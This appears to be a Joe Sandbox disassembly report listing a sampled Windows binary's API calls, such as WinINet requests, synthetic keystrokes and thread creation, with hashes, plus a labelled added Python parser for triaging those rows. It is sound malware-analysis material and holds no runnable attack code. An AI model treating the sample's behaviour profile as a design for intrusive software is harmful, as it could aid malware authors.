                • _free.LIBCMT ref: 00142C94
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 00142CA0
                • _free.LIBCMT ref: 00142CAB
                • _free.LIBCMT ref: 00142CB6
                • _free.LIBCMT ref: 00142CC1
                • _free.LIBCMT ref: 00142CCC
                • _free.LIBCMT ref: 00142CD7
                • _free.LIBCMT ref: 00142CE2
                • _free.LIBCMT ref: 00142CED
                • _free.LIBCMT ref: 00142CFB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 62e56f452a02354dbcd4c479f8fbcf1e1238eebcf55eb3b146a2458220018238
                • Instruction ID: d8f5c273083752f6c149300692f15e803c81f23a77523a9439cbfa0dbb3c5ce1
                • Opcode Fuzzy Hash: 62e56f452a02354dbcd4c479f8fbcf1e1238eebcf55eb3b146a2458220018238
                • Instruction Fuzzy Hash: CA119076100118AFDB02EF96D982CDD3BA9FF15354F9144A5FA489B232DB31EA909B90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00111459
                • OleUninitialize.OLE32(?,00000000), ref: 001114F8
                • UnregisterHotKey.USER32(?), ref: 001116DD
                • DestroyWindow.USER32(?), ref: 001524B9
                • FreeLibrary.KERNEL32(?), ref: 0015251E
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0015254B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                • String ID: close all
                • API String ID: 469580280-3243417748
                • Opcode ID: 7137fb1292318abe067a31910ba8d6c84924e62316752dc8b4699966d1a3b206
                • Instruction ID: a816e3341f212d8d2a63a39184ae451e99c8a32625fd48614b0a6863e9485c15
                • Opcode Fuzzy Hash: 7137fb1292318abe067a31910ba8d6c84924e62316752dc8b4699966d1a3b206
                • Instruction Fuzzy Hash: 5ED1BC32701222DFCB2DEF14C598BA9F7A0BF16700F1541ADE95A6B252DB30AC56CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00187FAD
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00187FC1
                • GetFileAttributesW.KERNEL32(?), ref: 00187FEB
                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00188005
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188017
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188060
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001880B0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile
                • String ID: *.*
                • API String ID: 769691225-438819550
                • Opcode ID: b95a22c1402307989c62ec4326db2f0bafa95d84ad49468c638332c025d09a8e
                • Instruction ID: 1822f0eb25590ceb206329fbe6dfb2ccbbb4952a5795e96161c95ffb4bfd7994
                • Opcode Fuzzy Hash: b95a22c1402307989c62ec4326db2f0bafa95d84ad49468c638332c025d09a8e
                • Instruction Fuzzy Hash: B981A1725082059BCB24FF14C4849AAB7E9BF99310F644C6EF889D7290EB35DE45CF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,000000EB), ref: 00115C7A
                  • Part of subcall function 00115D0A: GetClientRect.USER32(?,?), ref: 00115D30
                  • Part of subcall function 00115D0A: GetWindowRect.USER32(?,?), ref: 00115D71
                  • Part of subcall function 00115D0A: ScreenToClient.USER32(?,?), ref: 00115D99
                • GetDC.USER32 ref: 001546F5
                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00154708
                • SelectObject.GDI32(00000000,00000000), ref: 00154716
                • SelectObject.GDI32(00000000,00000000), ref: 0015472B
                • ReleaseDC.USER32(?,00000000), ref: 00154733
                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001547C4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                • String ID: U
                • API String ID: 4009187628-3372436214
                • Opcode ID: a276446ecd5819704405e571ebebd091dd7c01a0ec614ec4289e97a069ce10d5
                • Instruction ID: a66c7950578561d74e8e4fcc032e93e51fcdefd99a3a06035c33d63d01883b35
                • Opcode Fuzzy Hash: a276446ecd5819704405e571ebebd091dd7c01a0ec614ec4289e97a069ce10d5
                • Instruction Fuzzy Hash: D571FF34400205DFCF29CF64C984AEA3BB6FF8A36AF144229ED655E266C73088C5DF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001835E4
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • LoadStringW.USER32(001E2390,?,00000FFF,?), ref: 0018360A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LoadString$_wcslen
                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 4099089115-2391861430
                • Opcode ID: 089823311d9c64c6d7fa548fbcd7483c97ac12fce95e6ce729a63fa7fa703d9c
                • Instruction ID: 98680a9ddeabffc3554d4f3daba0df75faf6b515c1b626adeb8bf9ba08aa8fcf
                • Opcode Fuzzy Hash: 089823311d9c64c6d7fa548fbcd7483c97ac12fce95e6ce729a63fa7fa703d9c
                • Instruction Fuzzy Hash: 63516D71800209BADF19EBE0DC52EEEBB38AF24710F144125F525761A1EB316BD9DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                  • Part of subcall function 0012912D: GetCursorPos.USER32(?), ref: 00129141
                  • Part of subcall function 0012912D: ScreenToClient.USER32(00000000,?), ref: 0012915E
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000001), ref: 00129183
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000002), ref: 0012919D
                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 001A8B6B
                • ImageList_EndDrag.COMCTL32 ref: 001A8B71
                • ReleaseCapture.USER32 ref: 001A8B77
                • SetWindowTextW.USER32(?,00000000), ref: 001A8C12
                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001A8C25
                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 001A8CFF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                • API String ID: 1924731296-2107944366
                • Opcode ID: 17bdcdb3c02d713fffb0330491cc4a35be595aed42a2e31c535bc8e4fb8cf3d5
                • Instruction ID: 121f4881d590c8435c49c5d58225b1261f9a1c588006c51f6e116d75404167c4
                • Opcode Fuzzy Hash: 17bdcdb3c02d713fffb0330491cc4a35be595aed42a2e31c535bc8e4fb8cf3d5
                • Instruction Fuzzy Hash: A6519C74204204AFD704DF14DC95FAE77E4FB89714F00062DF996A72E2DB709994CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0018C272
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018C29A
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0018C2CA
                • GetLastError.KERNEL32 ref: 0018C322
                • SetEvent.KERNEL32(?), ref: 0018C336
                • InternetCloseHandle.WININET(00000000), ref: 0018C341
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                • String ID:
                • API String ID: 3113390036-3916222277
                • Opcode ID: 8c1f7ebf03e790a7907574f018b78408e1280f7405d1fc464457c5e19d19272e
                • Instruction ID: eddcef508d0e229c694caeb85185fcc27ea7b29a747216c39e91d6dc05cbbec4
                • Opcode Fuzzy Hash: 8c1f7ebf03e790a7907574f018b78408e1280f7405d1fc464457c5e19d19272e
                • Instruction Fuzzy Hash: 1B316DB1500604AFD721AFA49888AAB7BFCFB5A744F10851EF84692640DB34DE459FB0
                Uniqueness

                Uniqueness Score: -1.00%
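The WinINet record above (InternetOpenUrlW, HttpSendRequestW, HttpQueryInfoW with info level 5, then SetEvent and InternetCloseHandle) is the kind of row set an analyst pulls out of a listing like this to find the functions worth opening in the disassembler. The following is an added example, not part of the Joe Sandbox report or of the sample's code: a small Python parser for the "APIs" rows in this listing that splits them into per-function records, separates a function's own calls from "Part of subcall function" rows, flags records that touch WinINet, memory-management or MessageBox APIs, and names the constants in a few flag arguments. The sample input is constructed from rows on this page; the signal categories and the small constant tables are my own choices for illustration, using documented Win32 values.

```python
import re
from collections import defaultdict

# Constructed input: "APIs" rows copied from the Joe Sandbox IDA-plugin listing
# above, in the layout the report uses (one record per "APIs" header; rows that
# begin "Part of subcall function" describe a callee, not this function).
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0018C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0018C2CA
• GetLastError.KERNEL32 ref: 0018C322
• SetEvent.KERNEL32(?), ref: 0018C336
• InternetCloseHandle.WININET(00000000), ref: 0018C341
Strings
APIs
  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
• LoadStringW.USER32(00000000,?,00153AAF,?), ref: 001798C3
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00179987
Strings
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00111459
• DestroyWindow.USER32(?), ref: 001524B9
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 0015254B
"""

# One "APIs" row: optional subcall prefix, Name.MODULE, optional (args), ref: addr.
ROW = re.compile(r"""
    ^\s*•\s*
    (?:Part\ of\ subcall\ function\ (?P<callee>[0-9A-F]+):\s*)?
    (?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)
    (?:\((?P<args>[^)]*)\))?
    ,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$
""", re.VERBOSE)


def parse_records(text):
    """Split the listing into records (one per 'APIs' header) of parsed rows."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = ROW.match(line)
        if m and current is not None:
            row = m.groupdict()
            row["args"] = row["args"].split(",") if row["args"] is not None else []
            current.append(row)
    return records


# Constant tables for a few arguments worth reading by eye, keyed by
# (API name, zero-based argument index). Values are documented Win32 constants;
# which arguments to decode is an assumption made for this example.
FLAGS = {
    ("MessageBoxW", 3): {0x10: "MB_ICONERROR", 0x1000: "MB_SYSTEMMODAL",
                         0x10000: "MB_SETFOREGROUND"},
    ("VirtualFree", 2): {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"},
}
LEVELS = {("HttpQueryInfoW", 1): {5: "HTTP_QUERY_CONTENT_LENGTH"}}


def decode_arg(row, index):
    """Name the constant in row['args'][index] if it is known, else None."""
    try:
        value = int(row["args"][index], 16)
    except (IndexError, ValueError):   # '?' means the sandbox could not resolve it
        return None
    key = (row["api"], index)
    if key in LEVELS:
        return LEVELS[key].get(value)
    if key in FLAGS:
        names = [name for bit, name in FLAGS[key].items() if value & bit]
        return "|".join(names) or None
    return None


# Signals used for triage (an illustrative choice); only a function's own rows
# count, so a callee's network call does not tag every caller.
SIGNALS = {
    "network": lambda r: r["module"] in {"WININET", "WINHTTP", "WS2_32"},
    "memory": lambda r: r["api"] in {"VirtualAlloc", "VirtualFree",
                                     "VirtualProtect", "WriteProcessMemory"},
    "user_prompt": lambda r: r["api"] in {"MessageBoxW", "MessageBoxA"},
}


def triage(records):
    """Map signal name -> list of record indexes whose own rows match it."""
    hits = defaultdict(list)
    for i, rec in enumerate(records):
        own = [r for r in rec if r["callee"] is None]
        for name, pred in SIGNALS.items():
            if any(pred(r) for r in own):
                hits[name].append(i)
    return dict(hits)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for name, idx in triage(recs).items():
        print(name, "->", [recs[i][-1]["ref"] for i in idx])
    print(decode_arg(recs[1][2], 3))
```

Feeding the whole listing through `parse_records` and then `triage` gives the record indexes to open first; the `ref` addresses in each record are the call sites to jump to. Subcall rows are kept in the record (with `callee` set) so a reader can still see what the function reaches indirectly, but they are excluded from the signal match to keep the hit list to functions that make the call themselves.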

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00153AAF,?,?,Bad directive syntax error,001ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001798BC
                • LoadStringW.USER32(00000000,?,00153AAF,?), ref: 001798C3
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00179987
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HandleLoadMessageModuleString_wcslen
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 858772685-4153970271
                • Opcode ID: 6ad01d967e3d105380577dce40f07df54fa5f8c9918298928db6641c1c4b40c1
                • Instruction ID: 2506100b5f7007bf197bf114688912559890971c97df0e1d7f4d07dcf79db18c
                • Opcode Fuzzy Hash: 6ad01d967e3d105380577dce40f07df54fa5f8c9918298928db6641c1c4b40c1
                • Instruction Fuzzy Hash: 9B21913190021EFBDF15AF90CC06EEE7775FF28304F04446AF629660A2EB71A658DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32 ref: 001720AB
                • GetClassNameW.USER32(00000000,?,00000100), ref: 001720C0
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0017214D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 1290815626-3381328864
                • Opcode ID: 13fda0cc6b78335442b7d0b446934f7109ac5c81a886da7911f0e7e14fda5ca1
                • Instruction ID: d49ec6cf8666ffa6efccf7581d159327e16f42beaaba9ab440965ee61951c812
                • Opcode Fuzzy Hash: 13fda0cc6b78335442b7d0b446934f7109ac5c81a886da7911f0e7e14fda5ca1
                • Instruction Fuzzy Hash: 4C11557A288306BAFB056220DC07CE733ADEB15324F208017FB0DA51E2FF71A8435654
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                • String ID:
                • API String ID: 1282221369-0
                • Opcode ID: bc706388ae33c86d60ddfce82272aa0e8f558620d17640129e8121cd77dd6a17
                • Instruction ID: a86aaba15cedb6a2bfc81570d5b59ca09b5e0e165e6d1ad058aed9b217e9258f
                • Opcode Fuzzy Hash: bc706388ae33c86d60ddfce82272aa0e8f558620d17640129e8121cd77dd6a17
                • Instruction Fuzzy Hash: 53617871A05311AFDF22AFF4DC81A6EBBA5EF15320F04016DF9449B2A2DB359D8587E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 001A5186
                • ShowWindow.USER32(?,00000000), ref: 001A51C7
                • ShowWindow.USER32(?,00000005,?,00000000), ref: 001A51CD
                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001A51D1
                  • Part of subcall function 001A6FBA: DeleteObject.GDI32(00000000), ref: 001A6FE6
                • GetWindowLongW.USER32(?,000000F0), ref: 001A520D
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A521A
                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001A524D
                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 001A5287
                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 001A5296
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                • String ID:
                • API String ID: 3210457359-0
                • Opcode ID: df65b84c6037ff1c219b23869e98d09099fdb607eca386e318db4b395880491a
                • Instruction ID: 0fd17d8b4182d32ac39c79c6923e97600ccf39a7a33923e57b6ae2e980216d8a
                • Opcode Fuzzy Hash: df65b84c6037ff1c219b23869e98d09099fdb607eca386e318db4b395880491a
                • Instruction Fuzzy Hash: FE51C038A48A08FEEF349F24DC4ABE83B63FB17364F184012F615962E1C775A990DB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00166890
                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001668A9
                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001668B9
                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001668D1
                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001668F2
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00128874,00000000,00000000,00000000,000000FF,00000000), ref: 00166901
                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0016691E
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00128874,00000000,00000000,00000000,000000FF,00000000), ref: 0016692D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Icon$DestroyExtractImageLoadMessageSend
                • String ID:
                • API String ID: 1268354404-0
                • Opcode ID: fcffff0ddeb829932b4b03445a00b200479423526bcd7b1bdb7958f10967c3f3
                • Instruction ID: 7a622557c3273d85cb6ab2542520ac92006341a588ed5a33b1db166c85c7cbd1
                • Opcode Fuzzy Hash: fcffff0ddeb829932b4b03445a00b200479423526bcd7b1bdb7958f10967c3f3
                • Instruction Fuzzy Hash: 90517770A00209EFDB24CF28DC95FAA7BB5FB58754F10451CF916976A0DB70E9A0DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0018C182
                • GetLastError.KERNEL32 ref: 0018C195
                • SetEvent.KERNEL32(?), ref: 0018C1A9
                  • Part of subcall function 0018C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0018C272
                  • Part of subcall function 0018C253: GetLastError.KERNEL32 ref: 0018C322
                  • Part of subcall function 0018C253: SetEvent.KERNEL32(?), ref: 0018C336
                  • Part of subcall function 0018C253: InternetCloseHandle.WININET(00000000), ref: 0018C341
                Similarity
                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                • String ID:
                • API String ID: 337547030-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00173A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00173A57
                  • Part of subcall function 00173A3D: GetCurrentThreadId.KERNEL32 ref: 00173A5E
                  • Part of subcall function 00173A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001725B3), ref: 00173A65
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001725BD
                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001725DB
                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001725DF
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001725E9
                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00172601
                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00172605
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017260F
                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00172623
                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00172627
                Similarity
                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                • String ID:
                • API String ID: 2014098862-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00171449,?,?,00000000), ref: 0017180C
                • HeapAlloc.KERNEL32(00000000,?,00171449,?,?,00000000), ref: 00171813
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00171449,?,?,00000000), ref: 00171828
                • GetCurrentProcess.KERNEL32(?,00000000,?,00171449,?,?,00000000), ref: 00171830
                • DuplicateHandle.KERNEL32(00000000,?,00171449,?,?,00000000), ref: 00171833
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00171449,?,?,00000000), ref: 00171843
                • GetCurrentProcess.KERNEL32(00171449,00000000,?,00171449,?,?,00000000), ref: 0017184B
                • DuplicateHandle.KERNEL32(00000000,?,00171449,?,?,00000000), ref: 0017184E
                • CreateThread.KERNEL32(00000000,00000000,00171874,00000000,00000000,00000000), ref: 00171868
                Similarity
